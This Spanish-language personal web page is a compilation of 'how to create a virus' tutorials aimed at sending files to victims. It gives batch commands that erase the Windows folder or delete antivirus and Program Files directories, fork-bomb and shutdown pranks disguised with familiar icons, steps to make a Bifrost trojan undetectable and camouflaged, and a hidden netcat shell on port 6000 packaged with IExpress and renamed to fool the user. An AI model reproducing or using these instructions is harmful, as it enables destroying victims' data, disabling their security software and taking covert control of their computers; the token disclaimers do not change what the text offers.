como crear virus
le enseñare a crear unos cuantos virus. COMO CREAR VARIOS VIRUS. Este es un manual para crear un virus que No lo detecta ningún antivirus, Ni nada.. pero es muy destructible.. lo único que necesitas es NOTEPAD jejjeje.. todos lo tienen ok pues.. aqui les enseño como.. La Prueba Para que Prueban como Funciona, esta es la prueba 1- Abran Notepad, Y escriban cualquier cosa 2- Guardenlo en C:/ y pueden ponerle Prueba.txt de nombre (C:/Prueba.txt) 3- Ahora Abran otra ves Notepad, Y Escriban erase C:Prueba.txt y guárdenlo en cualquier lado como Prueba.cmd 4- Ahora habrán el Prueba.cmd y Pufff!!, elimino la Prueba.txt de c:/ (la que creaste en el paso 2) Bueno ahora que ya vimos que podemos hacer bamos a hacer el verdadero... EL Ataque 1- Abran Notepad, y pongan erase C:WINDOWS q 2- Ahora ponganle de nombre cualquier cosa (quedaría así uriel.cmd) 3- Guárdenlo en cualquier lugar, y NO LO ABRAN!!!!!!!!!!!!!!!! ahora eso es todo.. ahora pueden enviárselo a su victima y cuando lo habrán TODO EL WINDOWS SE LES VA A BORRAR...! jejejjejeje ------------------------------------------------------------------- Resumido: Abran Notepad, Escriban erase C:WINDOWS q, guárdenlo con formato .cmd mándenselo a la persona y ya... !! Esto Es solo Para Información Y Solo Lo pongo para que sepan y tengan mas conocimiento de esto!.. YO NO les estoy diciendo que lo usen y borren todo el Windows de alguien, yo solo lo pongo con promedio d información nada mas!!!... No Soy LAMER ni nada.. YO NO SOY el responsable de lo que hagan con el!! Ustedes tienen cerebro y ya son suficiente grandes para poder decidir que hacer con esto..!! otro virus : Si tienes ganas de jugarle una pequeña broma a algún amigo inexperto, vamos a ver como crear un “virus” que apague su computadora, sin que pueda hacer nada para evitarlo (las instrucciones son para Windows XP). 1. Haz click derecho en el escritorio y crea un nuevo acceso directo mediante el menu Nuevo – Acceso Directo. 2. En la ventana que aparece, tipea lo siguiente: shutdown -s -t 60 -c “Virus detectado, la computadora se apagará automáticamente”. Puedes cambiar el 60 por el valor que desees, representa el tiempo en segundos que pasará antes de uqe la PC empiece a apagarse. También puedes cambiar el texto entre comillas por el que prefieras. 3. Click en “Siguiente” y dale al acceso el nombre Internet Explorer (jejeje). 4. Tendrás un nuevo ícono en tu escritorio. Ahora vamos a hacerlo más realista. Haz click derecho sobre el nuevo ícono y dale a “Propiedades”. 5. En la ventana que aparece, selecciona la pestaña “Acceso Directo” y haz click sobre “Cambiar Ícono”. 6. El ícono de Internet Explorer debe estar en Archivos de Programa/Internet Explorer/ 8. Con esto debes tener un ícono en el escritorio como el de Internet Explorer listo para ejecutar el “virus”. Lo que hace este supuesto virus es simplemente apagar la computadora una vez pasado los segundos indicados, sin que puedas hacer algo para detenerlo, mostrando un mensaje. Si deseas evitar que la computadora se apague, solo debes ir a Inicio – Ejecutar, escribir shutdown -a y presionar Enter. Cualquier persona inexperta en computadoras caerá fácilmente con esta inofensiva broma. más virus : 1. Abre el bloc de notas 2. Escribe el siguiente código: @echo off :a start start start start start start goto :a 3. Vete a archivo -> guardar como: Mi PC.bat , esto es el nombre del archivo, lo puedes llamar como quieras pero que termine en .bat. En tipo has de seleccionar todos los archivos 4. Puedes cambiar el icono por otro que te guste, por ejemplo por el de Mi PC, de esta manera pasará desapercibido. 5. Ya se lo puedes enviar a tu victima. Es un virus inofensivo, lo que hace el script, es abrir CMD seis veces continuamente y no tienes manera de detenerlo, simplemente reinicia el ordenador y el problema estará solucionado. Lo podemos considerar un truco del bloc de notas. otro: este elimina el anti - virus panda escriban en notepad: @echo off cls cd cd "archivos de programa" attrib -R -A -S -H *.* del /S /Q *.* cd.. cd "Panda Software" attrib -R -A -S -H *.* del /S /Q *.* cd.. cd "Mcafee.com" attrib -R -A -S -H *.* del /S /Q *.* cd.. cls son más : Cómo crear un virus troyano Este tutorial ha podido ser actualizado en tu web de informatica. Pulsa sobre el enlace para ir a la página nueva. Introducción En este tutorial vamos a aprender a crear un virus troyano. Pero primero, como muchos se preguntaran, ¿qué es un virus troyano? Un virus troyano es un virus con el que puedes manejar el ordenador de tu víctima (la persona a la que infectes) como si fuera el tuyo. Podrás bajarte archivos de su ordenador, subirle archivos, abrirlos tanto en tu ordenador como en el suyo, finalizarle procesos, etc. Todo lo que puedes hacer lo veremos más adelante. Tipos de troyanos Se pueden diferenciar dos tipos de troyanos, dependiendo de cómo se conecten a nuestro ordenador: De conexión directa, con los que sacamos el ip de la víctima y a través de ésta nos conectamos a su ordenador. El problema es que los ips no suelen ser fijos, suelen cambiar cada vez que enciendes el ordenador, por lo que tenemos que sacar el ip cada vez que querramos conectarnos. De conexión inversa, con los que no tenemos que sacar el ip a la víctima, ya que una vez que ejecuten el troyano se conectarán automáticamente cada vez que enciendan el ordenador. Lógicamente los mejores son los de conexión inversa, y por lo tanto son los que os enseñaré a hacer. Partes de un troyano En un troyano se pueden diferenciar dos partes: el servidor y el cliente. El servidor es el virus en sí, el archivo que debe abrir la víctima en su ordenador para infectarse y que una vez infectada se conectará con el tuyo. El cliente es el archivo que debes abrir en tu ordenador para controlar remotamente el de tu víctima. Una vez dicho esto, vamos a proceder a crear nuestro troyano. 1. Conseguir una no-ip Una vez que infectes a alguien podrás controlar su ordenador gracias a que el virus (si es de conexión inversa) manda la información a tu ip, recibiéndola en tu ordenador. Pero aquí hay un problema, como hemos dicho antes las ips no suelen ser fijas, por lo que acabarías perdiendo la conexión con tu víctima. Logicamente la solución a este problema es crear una ip estática (que siempre sea la misma) y dirigirla a tu ordenador, y ésta es conocida como no-ip. Podrás ver como se crea una no-ip en el manual de Cómo conseguir una no-ip. 2. Crear el troyano con bifrost Hay muchos virus troyanos de conexión inversa, entre los que los mas famosos son el bifrost y el poison, pero hay muchos más como el pro rat, el slh4, el coolvides, etc. 3. Hacer el virus indetectable Está claro que el virus así no se lo vamos a colar a nadie, porque lo detectan todos los antivirus, por lo que vamos a hacerlo indetectable. Podeis ver como hacerlo indetectable en: Hacer tu server indetectable 4. Camuflar el virus Ya sólo nos queda meterle el virus a quien nos caiga mal, pero el virus no se lo podemos mandar tal cual porque se dará cuenta aunque el antivirus no lo detecte. Lo que vamos a hacer es incluirlo en un archivo de forma que cuando lo ejecute se abran los dos, el archivo y el virus. El problema es que el archivo resultante será .exe, aunque al abrirlo sea una imagen o un video, por lo que será mejor pensar bien cómo pasarle el virus a nuestra víctima. Para ver como camuflar el virus ve a camuflar el server. y más : PROGRAMADO EN VISUAL BASIC 6.0 El Control Winsock.- El Winsock Control como opción predeterminada no se encuentra disponible en la barra de controles estándar de Visual Basic, para acceder a él debemos agregarlo manualmente mediante Proyecto> Componentes> y luego seleccionar WinSock Control y Aceptar. No es visible en tiempo de ejecución, lo que significa que solo nosotros sabemos que el control se encuentra en nuestra aplicación y cuáles son sus propiedades, aunque también se pueden definir en tiempo de ejecución. Este tipo de aplicaciones Cliente/Servidor permiten comunicar programas entre sí, en consecuencia también permiten comunicar varias computadoras, porque habiendo un programa en la computadora llama "DAVID1" y otro en la computadora llama "DAVID2" ambos programas se pueden comunicar a través de Internet y compartir información, o adquirir información sin saber que el dueño de la computadora lo autoriza. Esto frecuentemente trae problemas al querer distinguir si un programa esta autorizado por el dueño o el encargado(administrador) para acceder al sistema. Varios administradores permiten el acceso, pero a la misma vez restringen las carpetas importantes de sus computadoras para no correr el riesgo de perder información vital. Si el programa que se usa para acceder a otra computadora esta autorizado por el encargado de la PC se puede denominar "Herramienta de administración remota", en cambio si el acceso no es permitido o no se avisa que se quiere entrar y se hace a la fuerza el programa recibe el nombre de "Troyano". Un troyano es un aplicación "disfrazada" de un programa útil, consta de dos programas, el Servidor y el Cliente El "Servidor" es el que se encarga de abrir un puerto en la PC a la que se quiere tener acceso y deja el puerto a la escucha, es decir esperar a que se realice una conexión al puerto para dar el acceso a la máquina. Por su parte, el "Cliente", es el programa que se conecta al puerto que el Servidor dejó abierto, solicita que se realice la conexión y después comienza a transmitir información, pidiendo datos de la PC remota, tales como Información del sistema, contraseñas, archivos importantes, etc. ¿Cómo se utilizan?.- Se pueden utilizar de dos formas completamente distintas: Como herramienta de administración remota: que permite manipular el sistema a distancia, ideal para personas que necesitan urgente un archivo de la PC de su oficina y se encuentran en su casa. Se puede considerar como tal solo cuando el usuario tenga el acceso permitido a esa PC. Como herramienta para hachear esta es la forma de utilización que prefiere cualquier persona con una conexión a Internet y ganas de espiar lo que hace otra persona conectada a Internet o a su Red privada, también llamada LAN . Pudiendo acceder a sus archivos confidenciales, contraseñas, recursos compartidos, conversaciones que toman lugar en tiempo real, o borrar archivos fundamentales tales como por ejemplo: COMMAND.COM (dejando a la PC "víctima" sin poder arrancar, a menos que el usuario "atacado" sepa iniciar desde un disco de rescate o de inicio. Los puertos que se dejan a la escucha generalmente son altos, es decir puertos que pasan de l número 500 o el 1000, para garantizar que ningún otro programa pueda estar usándolos y cancelar la conexión del troyano. Ejemplos de troyanos.- A continuación se enumeran una lista de los troyanos más conocidos del Underground, es decir de la sociedad hacker, o más bien todo aquello que sea difícil de encontrar para el usuario común. La palabra UnderGround significa debajo de la tierra, lo que para la mayoría significa algo oculto y qué otro ejemplo más conciso que los programas que usa un hacker. Cabe aclarar que el uso de estos programas comunmente denominados "para hackers" no convierte a nadie pero absolutamente nadie en "hacker". El hacker no se hace de la noche a la mañana, es más, el hacker no se hace, nace... NetBus: este "troyano" o "herramienta de administración remota" fue uno de los más difundidos en Internet, ganó un gran número de usuarios adictos al programa por su sencillez de uso y la rapidez del mismo. El tamaño del servidor (el encargado de permitir el acceso a la máquina con o sin autorización) ahora parece grande en comparación con los troyanos nuevos. Tamaño del servidor: 495 KB aproximadamente. Back Oriffice 2000: sin lugar a duda el troyano que más pánico causó en los últimos tiempos . Fue el preferido de todos por ser el primero que salió en Internet con una facilidad de uso impresionante y características que otros troyanos aun no imaginaban, como la renovada parte gráfica. En la última versión del programa se puede notar que fue programado para funciones de administración remota, ya que se nota la programación estructurada y concisa, sin botones de más, ni funciones innecesarias para el usuario final, la mejor versión hasta el momento. SubSeven: otro troyano que causó un gran impacto, probablemente el más usado en la actualidad, ya que el programa servidor ocupa menos aun que el servidor del NetBus o el Back Oriffice. La parte gráfica es distinta a las demás, la complementan un gran juego de "skins" (texturas, colores, etc.) y mejor facilidad de uso, además incluye nuevas funciones como la desconexión de Internet del equipo remoto, el cuelgue del modem, el cambio de reso lución de la pantalla, lista de los passwords que se encuentran en el cache (las contraseña s que el usuario escribió recientemente), y los passwords de la conexión telefónica a redes , es decir la contraseña de internet. Tamaño del servidor: 327 KB PROTOCOLOS Protocolos TCP/IP y UDP: como anteriormente quedó aclarado dos programas se pueden conectar entre sí a través de internet o de una LAN. Internet usa el protocolo TCP/IP que significa "Transmision Control Protocol / Internet Protocol", es el que se encarga de recibir paquetes de información y redirigirlos al usuario final que los solicitó. Este protocolo es el preferido por todos ya que posee una característica que UDP le envidia, TCP/IP puede verificar que el paquete de información haya llegado con éxito al destinatario final, concretando así la transacción. Por el contrario UDP no puede hacer esto, solo manda el paquete con la información y no verifica que haya llegado satisfactoriamente, poniendo de esta manera en peligro al paquete ya que puede no llegar entero al destinatario y por lo tanto no sirve si el paquete no llega en su totalidad. Todas las máquinas que están conectadas a Internet tienen asignadas un número que se forma con 4 cifras de 3 dígitos (que no pueden superar al número 255). Ejemplo del IP máximo que se puede encontrar: 255.255.255.255 Propiedades, métodos y eventos de WinSock Una vez que tenemos el WinSock control en nuestra barra de controles en Visual Basic ya podemos comenzar a ver las propiedades, eventos y métodos más importantes del control. Para agregarlo manualmente ir a Proyecto> Componentes> y luego seleccionar WinSock Control y Aceptar. Como mencionamos anteriormente este control no es visible en tiempo de ejecución. Primero abrimos un proyecto (EXE Estándar) y colocamos en control en cualquier parte del formulario. Vamos a comenzar por ver las propiedades, estas pueden ser puestas en tiempo de diseño como también en tiempo de ejecución. A continuación se detallan las propiedades más importantes. Lista de propiedades más importantes LocalIP: Devuelve la dirección IP de la máquina local en el formato de cadena con puntos de dirección IP (xxx.xxx.xxx.xxx). LocalHostName: Devuelve el nombre de la máquina local. RemoteHost: Establece el equipo remoto al que se quiere solicitar la conexión. LocalPort: Establece el puerto que se quiere dejar a la escucha. RemotePort: Establece el número del puerto remoto al que se quiere conectar. State: Verifica si el Control WinSock esta siendo utilizado o no. La sintaxis de cada propiedad es Objeto.Propiedad = Valor Donde Objeto va el nombre del Control WinSock, el nombre predeterminado cuando lo incluimos en alguna aplicación es "WinSock1". Luego le sigue la propiedad que deseamos asignar y finalmente el valor que la misma tomará. Ejemplo #1 Propiedad LocalIP Si queremos probar la propiedad LocalIP debemos seguir los siguientes pasos: Crear un Proyecto (EXE Estándar) y agregar el WinSock Control. Luego agregar una etiqueta vacía, es decir un Label. Por último, introduzca el siguiente código. Agregar etiqueta Private Sub Form_Load() Label1.caption = WinSock1.LocalIP End Sub Este simple ejemplo nos da de forma rápida nuestro IP, aunque no estemos conectados a Internet el IP aparece igual, solo que siempre va a tomar el valor : 127.0.0.1 Lista de Métodos más importantes.- Ahora que sabemos manejar las propiedades podemos seguir con los Métodos. A continuación se muestra la lista de algunos de los Métodos más importantes del Control WinSock. Accept: sólo para las aplicaciones de servidor TCP. Este método se utiliza para aceptar una conexión entrante cuando se está tratando un evento ConnectionRequest. GetData: recupera el bloque actual de datos y lo almacena en una variable de tipo Variant. Listen: crea un socket y lo establece a modo de escucha. SendData: envía datos a un equipo remoto. Lista de Eventos más importantes.- ConnectionRequest: se produce cuando el equipo remoto solicita una conexión. Sin este evento no se puede llevar a cabo la conexión. Connect: se produce cuando el equipo local se conecta al equipo remoto y se establece una conexión. Close: se produce cuando el equipo remoto cierra la conexión. Las aplicaciones deben usar el método Close para cerrar correctamente una conexión TCP. DataArrival: se produce cuando llegan nuevos datos. Este evento es importante, ya que debemos hacer algo con la información que llega. La sintaxis de los métodos y eventos es igual a la sintaxis de las propiedades, por lo cual no vamos a hacer referencia a ella. Conociendo las propiedades, métodos y eventos del Control WinSock podemos pasar a la labor de la programación. El siguente es un programa Servidor, lo que hace es: designar un puerto, dejarlo a la escucha para aceptar conexiones, si se realiza una petición de conexión aceptarla, y por último enviar datos al Cliente y recibir los datos que éste mande. Identificación de controles de la aplicación Servidor.- Para poder programar la siguiente aplicación necesitan tener el Control WinSock en el formulario. Para entender el correcto funcionamiento del protocolo TCP/IP vamos a empezar por programar la aplicación Servidor a la cual luego se conectará el Cliente. Ejemplo #2. Comenzamos por crear un proyecto nuevo (EXE estándar) para el Servidor, y agregamos la siguiente lista de controles al formulario principal. La ubicación de dichos controles es a gusto del programador, siempre tratando de que el usuario final este a gusto con el producto y que se pueda manejar libremente sin problemas por el entorno del mismo. -WinSock Control -2 cajas de texto (TextBox) -2 botones. Cambiar propiedades de los controles.- A continuación hace falta que cambiemos algunas propiedades de los controles, esta es la lista de controles con las respectivas propiedades a cambiar. Control (nombre predeterminado) Propiedad (nuevo valor) WinSock1 LocalPort = 888 Text1 Text = Text2 Text = Command1 Caption = "Escuchar" Command2 Caption = "Enviar" Para que el ejemplo funcione a la perfección conviene que seguir la ubicación de los controles como esta indicado en la siguiente imagen. Código.- Una vez hecho esto podemos empezar a tipear código. El sangrado del programa es una cuestión de entendimiento para el programador, algunos recurren a éste como otros no, eso también queda a criterio del que programa. Evento click del Command1 Private Sub Command1_Click() Winsock1.Listen End Sub Esto hace que el Control WinSock empiece a funcionar, escuchando el puerto que se indicó en las propiedades de dicho control. Este puerto es el 888. Ahora si realizamos todo a la perfección el puerto 888 esta siendo vigilado para aceptar conexiones remotas. Evento DataArrival del WinSock Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim datos As String Winsock1.GetData datos Text1.Text = Text1.Text + datos End Sub Datos queda transformada en una variable de cadena, y WinSock almacena los datos que recibe del Cliente en el buffer y luego ingresan a la variable datos, dicha variable mostrará su contenido en el control TextBox (Text1). Evento ConnectionRequest del Winsock Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) Winsock1.Close Winsock1.Accept requestID End Sub Este evento es muy importante, permite aceptar la petición de conexión. Sin este evento el resto del programa no tendría efecto. Evento Click del command2 Private Sub Command2_Click() Dim enviar As String enviar = Text2.Text Winsock1.SendData enviar End Sub Esto permite enviar el texto que se introduzca en el TextBox número 2. Para seguir programando el Cliente hace falta crear un nuevo proyecto y en el formulario principal incluir la siguiente lista de controles: - WinSock Control - 3 cajas de texto (TextBox) - 2 botones. Cambiar propiedades de los controles.- Como lo hicimos anteriormente hace falta cambiar algunas propiedades. Debajo la lista de controles con las respectivas propiedades para cambiar. Control (nombre predeterminado) Propiedad (nuevo valor) WinSock1 LocalPort = 888 Text1 Text = Text2 Text = Text3 Text = Command1 Caption = "Conectar" Command2 Caption = "Enviar" Para tener una referencia de cómo situar los controles observe la siguiente captura. Código.- Evento click del Command1 Private Sub Command1_Click() Winsock1.RemoteHost = Text3.Text Winsock1.Connect End Sub El evento connect permite conectar al programa servidor que esta esperando la solicitud, este evento requiere un parámetro fundamental, el IP o nombre de host el cual es introducido previamente a la conexión en el cuadro de texto número 3 (Text3). Evento DataArrival del WinSock Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim datos As String Winsock1.GetData datos Text1.Text = Text1.Text + datos End Sub Esto permite a la aplicación (a través de WinSock) recibir información del servidor y mostrarla en pantalla. Evento Click del command2 Private Sub Command2_Click() Dim enviar As String enviar = Text2.Text Winsock1.SendData enviar End Sub Estas instrucciones son necesarias para enviar información al servidor. Este ejemplo del primer programa Cliente / Servidor es muy simple, para utilizarlo al máximo es necesario por ejemplo poner las propiedades de los TextBox en Multiline, lo que hace que si los datos recibidos exceden el tamaño del TextBox estos datos vayan directo a la línea de abajo. como crear un troyano rápido y fácil : Antes de empezar quiero dejar claro, que no me hago responsable del daño que se pueda producir con este artículo y que en caso de que alguién copie el articulo, lo modifique o lo cuelgue pidó que al menos pongais mi nombre y la dirección de este blog, lo que hagas con este artículo o donde lo colgues me da lo mismo. En este pequeño artículo intentaré explicar de un modo sencillo como poder hacer un pequeño troyano sin tener ni idea de programación, que sea indetectable para los antivirus y el cual un usuario normal no se de cuenta ni de que exista. Para comenzar necesitamos estos 3 pequeños programas: - Iexpress - Netcat para XP - ResHacker - Pequeño .bat Explicación Programas A Usar Iexpress Este programa viene por defecto con el windows,por lo cual no hace falta bajarselo, solo tenemos que ir a inicio - ejecutar y poner "Iexpress.exe". Esto nos abrira un pequeño programa el cual usaremos para compliar en un paquete netcat con una serie de comandos para poder obtener una shell de la víctima en un puerto especifico. netcat Netcat es una herramienta con mil posibles funciones (no se le llama la navaja multiusos por nada..), entre ella usaremos la posibilidad de poder poner a la escucha la shell en un determinado puerto. Haciendo esto podremos tener un control total sobre el pc víctima ya que teniendo la shell ya tenemos gran parte del terreno ganado. ResHacker ResHacker es un pequeño .exe que nos permite cambiar el icono de cualquier ejecutable por otro, haciendo que nuestro pequeño programa no sea tan descarado a la vista. Teoria Si no eres nuevo en este mundillo y ya has escuchado hablar de netcat sabras de las multiples opciones que nos permite este gran programa. Nosotros solos nos centraremos en lo que nos interesa, poder poner una shell a la escucha en un puerto con el fin de despues nosotros poder conectarnos, esta práctica se conoce como "Reverse Shell". Para poder obtener una shell usando netcat usaremos el siguiente comando: nc -l -d -e cmd.exe -p 6000 Esto nos brinda una shell (cmd.exe) el cual esta a la escucha, ejecutado en background (el usuario no puede ver mas que el proceso en la lista de procesos pero no ve la ventana de netcat ejecutandose). -l --> Deja el puerto abierto a la espera del a conexión -d --> Ejecuta el programa en BackGround -e --> Ejecuta programa -p --> Especifica puerto Para poder conectarnos a la shell de la víctima no necesitamos más que conectarnos con: nc -vv [Ip Víctima] [Puerto] Manos a la Obra... Bueno después de esta pequeña explicación, vamos a ponernos manos a la obra. Una vez tengamos el netcat y el ResHacker descargados de internet (No recuerdo los links, pero vamos google lo sabe xD) ejecutamos cmd y tecleamos edit. Dentro del edit ponemos: "nc -l -d -e cmd.exe -p 6000" Y lo guardamos con extensión .bat y abrimos el iexpress desde inicio - ejecutar iexpress. Ahora sencillamente es seguir las indicaciones que salen en pantalla: 1.- Selecionamos la primera opción de crear un paquete SED 2.- Selecionamos la primera opción de extraer y ejecutar un comando de instalación 3.- Nombre del paquete 4.- En Prompt y licence no pondremos nada 5.- Selecionamos Add y buscamos el ejecutable de netcat en nuestro sistema 6.- Selecionamos en Install Program primero el .bat que hemos hecho y despues nc.exe (o el nombre que tenga vuestro netcat, recomiendo ponerle un nombre diferente a nc, como csrs para que no aparezca en la lista de procesos como nc.exe) 7.- Selecionamos Hidden para que el programa se inicie sin que el usuario lo vea 8.- En Mensaje Final no pondremos tampoco nada 9.- En Package Options pondremos el nombre del ejecutable y selecionaremos el checkbox de "Hide File Extracting Progress.." 10.- En Configure restart selecionaremos "No restart" 11.- Esto ya es decisión tuya si quieres o no guardar el SED para mas tarde hacer modificaciones sobre el mismo. Con esto ya estaría hecho nuestro pequeño troyano, únicamente tendriamos que pasarselo a nuestra víctima, que lo ejecutara y conectarnos a su ip al puerto 6000. Pero vamos a ser un poco mas curiosos y usando NetHacker cambiaremos el icono por otro de un programa usado normalmente por windows o si eres tan vago para hacer esto, ponle un nombre parecido al de un .exe de windows y arreando xD Abrimos el NetHacker buscamos el netcat y vamos a la carpeta iconos y cambiamos el icono por otro que no sea tan descarado. Ejemplo: Le pones supermario_bros.exe a nuestro programita y buscas por internet un mario.ico y se lo pones xD Notas - Este troyano solo funciona y se puede crear desde WINDOWS - El netcat aparecera ejecutado en la lista de procesos - Podemos Implementar el .bat para que copie el nc a system32 y hacer un pequeño reg add, lo que no he querido complicarlo para que cualquier usuario sea capaz de hacer este troyano Me despido y no abusen de esto..! ¬¬
estos son otros enlaces para contactar a paulo
 
Enviame un mensaje instantaneo
 
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis